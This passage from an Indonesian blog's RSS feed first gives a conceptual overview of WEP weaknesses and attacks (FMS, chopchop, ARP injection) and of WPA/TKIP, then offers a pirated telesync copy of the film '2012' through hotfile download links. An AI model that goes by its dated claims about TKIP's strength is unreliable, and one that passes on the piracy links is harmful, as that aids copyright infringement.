WEP memiliki berbagai kelemahan antara lain :&lt;br /&gt;
&lt;ol type="1"&gt;&lt;li&gt;Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;WEP menggunakan kunci yang bersifat statis&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Masalah initialization vector (IV) WEP&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Masalah integritas pesan Cyclic Redundancy Check (CRC-32)&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;div align="justify"&gt;WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.&lt;br /&gt;
Serangan-serangan pada kelemahan WEP antara lain :&lt;/div&gt;&lt;br /&gt;
&lt;div align="justify"&gt;&lt;ol type="1"&gt;&lt;li&gt;Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan &lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Keamanan wireless dengan metode WI-FI Protected Accsess (WPA)&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div align="justify"&gt;Merupakan rahasia umum jika WEP (Wired Equivalent Privacy) tidak lagi mampu diandalkan untuk menyediakan koneksi nirkabel (wireless) yang aman dari ulah orang usil atau ingin mengambil keuntungan atas apa yang kita miliki—dikenal dengan jargon hackers. Tidak lama setelah proses pengembangan WEP, kerapuhan dalam aspek kriptografi muncul.&lt;br /&gt;
Berbagai macam penelitian mengenai WEP telah dilakukan dan diperoleh kesimpulan bahwa walaupun sebuah jaringan wireless terlindungi oleh WEP, pihak ketiga (hackers) masih dapat membobol masuk. Seorang hacker yang memiliki perlengkapan wireless seadanya dan peralatan software yang digunakan untuk mengumpulkan dan menganalisis cukup data, dapat mengetahui kunci enkripsi yang digunakan.&lt;br /&gt;
Menyikapi kelemahan yang dimiliki oleh WEP, telah dikembangkan sebuah teknik pengamanan baru yang disebut sebagai WPA (WiFI Protected Access). Teknik WPA adalah model kompatibel dengan spesifikasi standar draf IEEE 802.11i. Teknik ini mempunyai beberapa tujuan dalam desainnya, yaitu kokoh, interoperasi, mampu digunakan untuk menggantikan WEP, dapat diimplementasikan pada pengguna rumahan atau corporate, dan tersedia untuk publik secepat mungkin. Adanya WPA yang "menggantikan" WPE, apakah benar perasaan "tenang" tersebut didapatkan? Ada banyak tanggapan pro dan kontra mengenai hal tersebut. Ada yang mengatakan, WPA mempunyai mekanisme enkripsi yang lebih kuat. Namun, ada yang pesimistis karena alur komunikasi yang digunakan tidak aman, di mana teknik man- in-the-middle bisa digunakan untuk mengakali proses pengiriman data. Agar tujuan WPA tercapai, setidaknya dua pengembangan sekuriti utama dilakukan. Teknik WPA dibentuk untuk menyediakan pengembangan enkripsi data yang menjadi titik lemah WEP, serta menyediakan user authentication yang tampaknya hilang pada pengembangan konsep WEP. &lt;br /&gt;
Teknik WPA didesain menggantikan metode keamanan WEP, yang menggunakan kunci keamanan statik, dengan menggunakan TKIP (Temporal Key Integrity Protocol) yang mampu secara dinamis berubah setelah 10.000 paket data ditransmisikan. Protokol TKIP akan mengambil kunci utama sebagai starting point yang kemudian secara reguler berubah sehingga tidak ada kunci enkripsi yang digunakan dua kali. Background process secara otomatis dilakukan tanpa diketahui oleh pengguna. Dengan melakukan regenerasi kunci enkripsi kurang lebih setiap lima menit, jaringan WiFi yang menggunakan WPA telah memperlambat kerja hackers yang mencoba melakukan cracking kunci terdahulu. &lt;br /&gt;
Walaupun menggunakan standar enkripsi 64 dan 128 bit, seperti yang dimiliki teknologi WEP, TKIP membuat WPA menjadi lebih efektif sebagai sebuah mekanisme enkripsi. Namun, masalah penurunan throughput seperti yang dikeluhkan oleh para pengguna jaringan wireless seperti tidak menemui jawaban dari dokumen standar yang dicari. Sebab, masalah yang berhubungan dengan throughput sangatlah bergantung pada hardware yang dimiliki, secara lebih spesifik adalah chipset yang digunakan. Anggapan saat ini, jika penurunan throughput terjadi pada implementasi WEP, maka tingkat penurunan tersebut akan jauh lebih besar jika WPA dan TKIP diimplementasikan walaupun beberapa produk mengklaim bahwa penurunan throughput telah diatasi, tentunya dengan penggunaan chipset yang lebih besar kemampuan dan kapasitasnya.&lt;br /&gt;
Proses otentifikasi WPA menggunakan 802.1x dan EAP (Extensible Authentication Protocol). Secara bersamaan, implementasi tersebut akan menyediakan kerangka kerja yang kokoh pada proses otentifikasi pengguna. Kerangka-kerja tersebut akan melakukan utilisasi sebuah server otentifikasi terpusat, seperti RADIUS, untuk melakukan otentifikasi pengguna sebelum bergabung ke jaringan wireless. Juga diberlakukan mutual authentification, sehingga pengguna jaringan wireless tidak secara sengaja bergabung ke jaringan lain yang mungkin akan mencuri identitas jaringannya.&lt;br /&gt;
Mekanisme enkripsi AES (Advanced Encryption Standard) tampaknya akan diadopsi WPA dengan mekanisme otentifikasi pengguna. Namun, AES sepertinya belum perlu karena TKIP diprediksikan mampu menyediakan sebuah kerangka enkripsi yang sangat tangguh walaupun belum diketahui untuk berapa lama ketangguhannya dapat bertahan.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Free Download Movie 2012 the movie</title><link>http://kluwanbacktrack.blogspot.com/2010/01/free-download-movie-2012-movie.html</link><category>daftar isi</category><category>movie free download</category><category>video</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Tue, 19 Jan 2010 23:19:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-2745643739509722380</guid><description>Free Download Movie 2012 the movie&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div id="news-id-4074"&gt;&lt;div align="center"&gt;&lt;img alt="2012 (2009)" height="200" onclick="return hs.expand(this, { src: 'http://i33.tinypic.com/2h80mzl.jpg' });" onmouseover="this.style.cursor='pointer';" src="http://i33.tinypic.com/2h80mzl.jpg" title="2012 (2009)" width="138" /&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="quote"&gt;2012 2009 HQ TeleSync LiNE XViD READNFO-FUSION&lt;br /&gt;
INFO : http://www.imdb.com/title/tt1190080/&lt;br /&gt;
Genre: Action | Drama | Thriller&lt;br /&gt;
Directed by: Roland Emmerich&lt;br /&gt;
Starring: John Cusack, Chjwetel Ejiofor, Amanda Peet, Oliver Platt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Never before has a date in history been so significant to so many cultures, so many religions, scientists, and governments. A global cataclysm brings an end to the world and tells of the heroic struggle of the survivors. Centuries ago, the Maya left us their calendar, with a clear end date and all that it implies. By 2012, we’ll know — we were warned.&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="javascript:%20void(0)" onclick="linkbot('http://linkzbot.com/check.php?id=http://www.blackshare.org/movies/4074-2012-2009.html')"&gt;&lt;b&gt;[ Check Download Links ]&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
http://hotfile.com/dl/17883265/50fa5ff/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part1.rar.html&lt;br /&gt;
http://hotfile.com/dl/17883606/cd0e395/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part2.rar.html&lt;br /&gt;
http://hotfile.com/dl/17883943/cf8fed0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part3.rar.html&lt;br /&gt;
http://hotfile.com/dl/17884196/162e637/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part4.rar.html&lt;br /&gt;
http://hotfile.com/dl/17884524/c5aca66/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part5.rar.html&lt;br /&gt;
http://hotfile.com/dl/17884874/3d37e8a/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part6.rar.html&lt;br /&gt;
http://hotfile.com/dl/17885212/9c58840/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part7.rar.html&lt;br /&gt;
http://hotfile.com/dl/17885221/66928d0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part8.rar.html</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://i33.tinypic.com/2h80mzl_th.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>